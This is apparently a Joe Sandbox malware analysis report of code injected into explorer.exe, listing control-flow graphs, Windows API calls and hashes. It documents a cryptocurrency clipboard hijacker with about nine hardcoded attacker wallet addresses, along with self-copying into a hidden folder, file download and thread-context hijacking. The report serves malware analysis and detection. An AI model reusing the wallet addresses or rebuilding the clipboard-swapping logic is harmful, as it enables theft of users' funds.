                                                                                                                                                                                                  control_flow_graph 223 c5bf3c0-c5bf401 CreateFileW 224 c5bf403-c5bf40f 223->224 225 c5bf410-c5bf450 GetFileSize GetProcessHeap HeapAlloc 223->225 226 c5bf452-c5bf46d ReadFile 225->226 227 c5bf490-c5bf498 CloseHandle 225->227 228 c5bf479-c5bf48d GetProcessHeap HeapFree 226->228 229 c5bf46f-c5bf477 226->229 230 c5bf53c-c5bf558 227->230 228->227 229->228 231 c5bf49d-c5bf4bf 229->231 232 c5bf52b-c5bf539 CloseHandle 231->232 233 c5bf4c1-c5bf4d6 call c5beee0 231->233 232->230 236 c5bf4d8-c5bf4dd 233->236 237 c5bf4e1-c5bf50e GetProcessHeap HeapAlloc 233->237 236->233 238 c5bf4df 236->238 237->232 239 c5bf510-c5bf527 call c5cd080 237->239 238->232 239->232
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3250796435-0
                                                                                                                                                                                                  • Opcode ID: 1ee118f475dfd9e3824291b507a5fd58fdba464822c7a7cac7f7b7c0e7c40d99
                                                                                                                                                                                                  • Instruction ID: 2339568f5c3831a36acb11e295c5e6dc270c59b838df38834a14e2e85bb449c6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ee118f475dfd9e3824291b507a5fd58fdba464822c7a7cac7f7b7c0e7c40d99
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64419D3A301B4187EB54CF66AC44BAABBA4F788B95F444229CE8E53794EF3CD1858710

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5BF040: GetWindowsDirectoryW.KERNEL32 ref: 0C5BF093
                                                                                                                                                                                                    • Part of subcall function 0C5BF040: GetVolumeInformationW.KERNEL32 ref: 0C5BF0E2
                                                                                                                                                                                                    • Part of subcall function 0C5BF040: wsprintfW.USER32 ref: 0C5BF144
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32 ref: 0C5BF1D5
                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0C5BF1E5
                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0C5BF1F3
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32 ref: 0C5BF1FE
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 0C5BF20C
                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0C5BF21C
                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0C5BF22A
                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0C5BF23A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                  • Opcode ID: 9d3ebb07f5aa5fbae722cfafc00fbd7fa1908fcf8a91481529766271def0b629
                                                                                                                                                                                                  • Instruction ID: fa801d6def361225a253d9d75c50353d4a78138f11c194f9e69e56cc6ea5da44
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d3ebb07f5aa5fbae722cfafc00fbd7fa1908fcf8a91481529766271def0b629
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C421657A318F0286EB98DF61FC18B4933A0F789742F412235DA8E87354EE78C249CB10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5BEF20: GetWindowsDirectoryA.KERNEL32 ref: 0C5BEF6C
                                                                                                                                                                                                    • Part of subcall function 0C5BEF20: GetVolumeInformationA.KERNEL32 ref: 0C5BEFB6
                                                                                                                                                                                                    • Part of subcall function 0C5BEF20: wsprintfA.USER32 ref: 0C5BF017
                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32 ref: 0C5BF2B3
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5BF2C3
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5BF2D1
                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32 ref: 0C5BF2DC
                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32 ref: 0C5BF2EA
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5BF2FA
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5BF308
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5BF318
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                  • Opcode ID: 2816d621a84a5ae1f8ef81d4d8d11842e33c2e50ab7633ac5655931446d6be67
                                                                                                                                                                                                  • Instruction ID: 6ab62651714fa8564f7d09259326e1d6b95b578dc63d83e51724a9ecf2353d29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2816d621a84a5ae1f8ef81d4d8d11842e33c2e50ab7633ac5655931446d6be67
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2115C39215F4681EB88DF21FC54B5A73A1F7C9782F442125E98B07768DEBCD2888B00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 254 c5c7600-c5c762a call c5c7c50 257 c5c7630-c5c7666 call c5c7bb0 call c5b2c20 call c5c74f0 call c5c7ce0 254->257 266 c5c7668-c5c76c6 call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 257->266 267 c5c76cb-c5c76f8 call c5b2c20 call c5c74f0 call c5c7ce0 257->267 266->267 280 c5c775d-c5c778a call c5b2c20 call c5c74f0 call c5c7ce0 267->280 281 c5c76fa-c5c7758 call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 267->281 301 c5c778c-c5c77ea call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 280->301 302 c5c77ef-c5c781c call c5b2c20 call c5c74f0 call c5c7ce0 280->302 281->280 301->302 322 c5c781e-c5c787c call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 302->322 323 c5c7881-c5c78ae call c5b2c20 call c5c74f0 call c5c7ce0 302->323 322->323 343 c5c78b0-c5c790e call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 323->343 344 c5c7913-c5c7940 call c5b2c20 call c5c74f0 call c5c7ce0 323->344 343->344 364 c5c79a5-c5c79d2 call c5b2c20 call c5c74f0 call c5c7ce0 344->364 365 c5c7942-c5c79a0 call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 344->365 386 c5c79d4-c5c7a32 call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 364->386 387 c5c7a37-c5c7a64 call c5b2c20 call c5c74f0 call c5c7ce0 364->387 365->364 386->387 406 c5c7ac9-c5c7af6 call c5b2c20 call c5c74f0 call c5c7ce0 387->406 407 c5c7a66-c5c7ac4 call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 387->407 427 c5c7af8-c5c7b56 call c5b1100 call c5b2c20 call c5c74f0 call c5c7d50 call c5b2c20 call c5c7da0 call c5b1200 406->427 428 c5c7b5b-c5c7b6a Sleep call c5b1200 406->428 407->406 427->428 433 c5c7b6f 428->433 433->257
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5C7BB0: OpenClipboard.USER32 ref: 0C5C7BC1
                                                                                                                                                                                                    • Part of subcall function 0C5C7BB0: GetClipboardData.USER32 ref: 0C5C7BD3
                                                                                                                                                                                                    • Part of subcall function 0C5C7BB0: GlobalLock.KERNEL32 ref: 0C5C7BE4
                                                                                                                                                                                                    • Part of subcall function 0C5C7BB0: GlobalUnlock.KERNEL32 ref: 0C5C7BF5
                                                                                                                                                                                                    • Part of subcall function 0C5C7BB0: CloseClipboard.USER32 ref: 0C5C7BFB
                                                                                                                                                                                                    • Part of subcall function 0C5C7DA0: GlobalAlloc.KERNEL32 ref: 0C5C7DC8
                                                                                                                                                                                                    • Part of subcall function 0C5C7DA0: GlobalLock.KERNEL32 ref: 0C5C7DDF
                                                                                                                                                                                                    • Part of subcall function 0C5C7DA0: GlobalUnlock.KERNEL32 ref: 0C5C7DF7
                                                                                                                                                                                                    • Part of subcall function 0C5C7DA0: OpenClipboard.USER32 ref: 0C5C7DFF
                                                                                                                                                                                                    • Part of subcall function 0C5C7DA0: EmptyClipboard.USER32 ref: 0C5C7E05
                                                                                                                                                                                                    • Part of subcall function 0C5C7DA0: SetClipboardData.USER32 ref: 0C5C7E13
                                                                                                                                                                                                    • Part of subcall function 0C5C7DA0: CloseClipboard.USER32 ref: 0C5C7E19
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0C5C7B60
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0C5C79D4
                                                                                                                                                                                                  • 0xe082eae973143a32d82db061b6c8885ceba72b87, xrefs: 0C5C76FA
                                                                                                                                                                                                  • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0C5C7AF8
                                                                                                                                                                                                  • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0C5C78B0
                                                                                                                                                                                                  • LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK, xrefs: 0C5C781E
                                                                                                                                                                                                  • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0C5C7A66
                                                                                                                                                                                                  • TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq, xrefs: 0C5C778C
                                                                                                                                                                                                  • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 0C5C7668
                                                                                                                                                                                                  • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0C5C7942
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                  • String ID: 0xe082eae973143a32d82db061b6c8885ceba72b87$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK$TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                  • API String ID: 2992153386-2300265441
                                                                                                                                                                                                  • Opcode ID: 8e4e17695470107b2ba372250f8e9ef4e484432434335ec0eec681aa2f322b34
                                                                                                                                                                                                  • Instruction ID: 316ceb6546ed88d6b8233d5ff54b6acfc75db92d2e743bc32306230694860017
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e4e17695470107b2ba372250f8e9ef4e484432434335ec0eec681aa2f322b34
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4D12E79711A47E8DF40EFB1D8A46DC6765B7A97CCF8041268A0EABE58EF24C20DC750

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 470 c5c51b0-c5c522a lstrcpyA call c5b9450 474 c5c522c-c5c523e call c5f0810 470->474 475 c5c52a7-c5c52bb free call c5f0888 SleepEx 470->475 480 c5c5250-c5c5277 StrChrA StrStrA 474->480 481 c5c5240-c5c5245 call c5c5630 474->481 483 c5c5279-c5c527c 480->483 484 c5c5280-c5c5283 480->484 481->475 483->484 486 c5c5285-c5c529d strtol call c5c5520 484->486 487 c5c52a2-c5c52a5 484->487 486->487 487->475 487->480
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0C5C520F
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: EnterCriticalSection.KERNEL32 ref: 0C5B9498
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: RtlInitializeCriticalSection.NTDLL ref: 0C5B94A5
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcpyA.KERNEL32 ref: 0C5B94DA
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcpyA.KERNEL32 ref: 0C5B94FD
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcatA.KERNEL32 ref: 0C5B950D
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcatA.KERNEL32 ref: 0C5B951D
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: LeaveCriticalSection.KERNEL32 ref: 0C5B95A4
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: memcpy.MSVCRT ref: 0C5B95BC
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrlenA.KERNEL32 ref: 0C5B95CA
                                                                                                                                                                                                  • lstrcmp.KERNEL32 ref: 0C5C5236
                                                                                                                                                                                                  • free.MSVCRT ref: 0C5C52AA
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0C5C52B5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4292776791-0
                                                                                                                                                                                                  • Opcode ID: 75ac25dd9946c4d92c84f3cffdd0c1f7501749257139f8378ce49bbffedee2f2
                                                                                                                                                                                                  • Instruction ID: 1793ebc4222a79b6845cc30332b4a16fc0ab9440a88840d24d1f2849ccb342a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ac25dd9946c4d92c84f3cffdd0c1f7501749257139f8378ce49bbffedee2f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D215E39306F45C9EB189B91AC4035AB7E5FBC8B85F884228DA8947B59EF3CE1458740

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                  • API String ID: 3001812590-1109288774
                                                                                                                                                                                                  • Opcode ID: 411c505c976d07ca4e508087cf72aac4fb374047555851578b32677912350526
                                                                                                                                                                                                  • Instruction ID: 455a0ddb25ca7b8b2a440f878562f739b4d51059291a84ad8ffb57464092244b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 411c505c976d07ca4e508087cf72aac4fb374047555851578b32677912350526
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55313E7A218A84CAD710CFA5E84079EB7B4FBD9344F901519E78D83A28EB7DC545CF10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                  • API String ID: 3001812590-790759568
                                                                                                                                                                                                  • Opcode ID: 5ed45928ed50404ec2b14fc3e929ae0aae8473c83614c336ee3b735911644cf0
                                                                                                                                                                                                  • Instruction ID: 5ccd9d0e6eee638ec52209eac14ea3a3309231ee3692815a1a6d71b1208a71b4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ed45928ed50404ec2b14fc3e929ae0aae8473c83614c336ee3b735911644cf0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A310B36218B84CAD710CF69E85078EBBA5FBD9344F94051AEBC983A68DB7CC559CB10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 539 c5b8fe0-c5b8fed 540 c5b904f-c5b9054 539->540 541 c5b8fef-c5b8ff9 539->541 542 c5b8ffb 541->542 543 c5b9038-c5b904a HeapFree 541->543 544 c5b9000-c5b9018 call c5e01a0 542->544 543->540 547 c5b901a-c5b9026 ResumeThread CloseHandle 544->547 548 c5b902c-c5b9031 544->548 547->548 548->544 549 c5b9033 548->549 549->543
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 993137029-0
                                                                                                                                                                                                  • Opcode ID: e25ee50e6b7928a534a906f02fdffc1d88cf6472f37a49b8be206883a26650b7
                                                                                                                                                                                                  • Instruction ID: 2e47b0c39df531933ec133c80b32be3d7aeb2e1a54df651998aa13982377b162
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e25ee50e6b7928a534a906f02fdffc1d88cf6472f37a49b8be206883a26650b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F01AD3A616A44C2EB08CB62E89075D7331FB88BC1F588129CB0A03754DF3AE192C700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2372642624-0
                                                                                                                                                                                                  • Opcode ID: 8f504c70640b8139afa37010149633b7eeaab020a9773121f4371d5cf0b4a091
                                                                                                                                                                                                  • Instruction ID: 133884ce5d9ec3830b2796236434f7f20a34b49e26735f5320effcee32bdfa5d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f504c70640b8139afa37010149633b7eeaab020a9773121f4371d5cf0b4a091
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E08678716B4083FF6E57B26C96B691361AB9C742F841528C80A45390EE6D97D99300
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 882653843-0
                                                                                                                                                                                                  • Opcode ID: 8a2ad72f8d84fa7d77685e25d36ebd332a7d8edca8835b01ae53de9ad63f65cc
                                                                                                                                                                                                  • Instruction ID: 9f23e4e1071b8a65e650a7072e4a71bed8477f39d951be682d184cbeb8b7485b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a2ad72f8d84fa7d77685e25d36ebd332a7d8edca8835b01ae53de9ad63f65cc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9031DDBB208AC086D7298F36E9003AD7F60F746F88F085216EF994B78ACB6DD451C714
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: lstrlenA.KERNEL32 ref: 0C5C5362
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: InternetCrackUrlA.WININET ref: 0C5C5377
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: PathFindFileNameA.SHLWAPI ref: 0C5C53F1
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: GetTempPathA.KERNEL32 ref: 0C5C540F
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: GetTempFileNameA.KERNEL32 ref: 0C5C5425
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: lstrcatA.KERNEL32 ref: 0C5C5435
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: lstrcatA.KERNEL32 ref: 0C5C5441
                                                                                                                                                                                                    • Part of subcall function 0C5C52C0: CreateFileA.KERNEL32 ref: 0C5C546A
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: SHGetFolderPathA.SHELL32 ref: 0C5BF2B3
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: lstrcatA.KERNEL32 ref: 0C5BF2C3
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: lstrcatA.KERNEL32 ref: 0C5BF2D1
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: CreateDirectoryA.KERNEL32 ref: 0C5BF2DC
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: SetFileAttributesA.KERNEL32 ref: 0C5BF2EA
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: lstrcatA.KERNEL32 ref: 0C5BF2FA
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: lstrcatA.KERNEL32 ref: 0C5BF308
                                                                                                                                                                                                    • Part of subcall function 0C5BF260: lstrcatA.KERNEL32 ref: 0C5BF318
                                                                                                                                                                                                  • DeleteFileA.KERNEL32 ref: 0C5C55B0
                                                                                                                                                                                                  • CopyFileA.KERNEL32 ref: 0C5C55C6
                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32 ref: 0C5C55D9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3447680573-0
                                                                                                                                                                                                  • Opcode ID: a0b9cef46a3a1d6777439f3854ecd079da23229d2f9189709319ddcc125878ba
                                                                                                                                                                                                  • Instruction ID: e7c17bd6092bbc38e57be580b8f7299cde4342b27f68620283f8b8fa8e22f9d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0b9cef46a3a1d6777439f3854ecd079da23229d2f9189709319ddcc125878ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B821933932898699FB34D7A5E8A47DEA391FBDD748FC00114C98D46948EFACD349DB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5B88B0: GetCurrentProcessId.KERNEL32 ref: 0C5B890B
                                                                                                                                                                                                    • Part of subcall function 0C5B88B0: GetCurrentThreadId.KERNEL32 ref: 0C5B8917
                                                                                                                                                                                                    • Part of subcall function 0C5B88B0: HeapAlloc.KERNEL32 ref: 0C5B8941
                                                                                                                                                                                                    • Part of subcall function 0C5B88B0: Thread32Next.KERNEL32 ref: 0C5B89A0
                                                                                                                                                                                                    • Part of subcall function 0C5B88B0: CloseHandle.KERNEL32 ref: 0C5B89B0
                                                                                                                                                                                                  • OpenThread.KERNEL32 ref: 0C5B8AEE
                                                                                                                                                                                                  • SuspendThread.KERNEL32 ref: 0C5B8AFF
                                                                                                                                                                                                    • Part of subcall function 0C5B8EA0: GetThreadContext.KERNEL32 ref: 0C5B8ED4
                                                                                                                                                                                                    • Part of subcall function 0C5B8EA0: SetThreadContext.KERNEL32 ref: 0C5B8F94
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0C5B8B16
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4205413918-0
                                                                                                                                                                                                  • Opcode ID: a47975617ac881b49f0cec2b761dd34382b37af9e36fee6c2cc171b40450e71b
                                                                                                                                                                                                  • Instruction ID: 2f04df0f3071f0366ae6b4480e5281022859cbdd84fed91db149e8948599a630
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a47975617ac881b49f0cec2b761dd34382b37af9e36fee6c2cc171b40450e71b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75018E3A615B80C6E718DF12A88065DBB64F7C9FC0F58A124DB8A13B54CF38D162CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5B8860: Sleep.KERNEL32 ref: 0C5B888C
                                                                                                                                                                                                  • HeapCreate.KERNEL32 ref: 0C5B8DCD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateHeapSleep
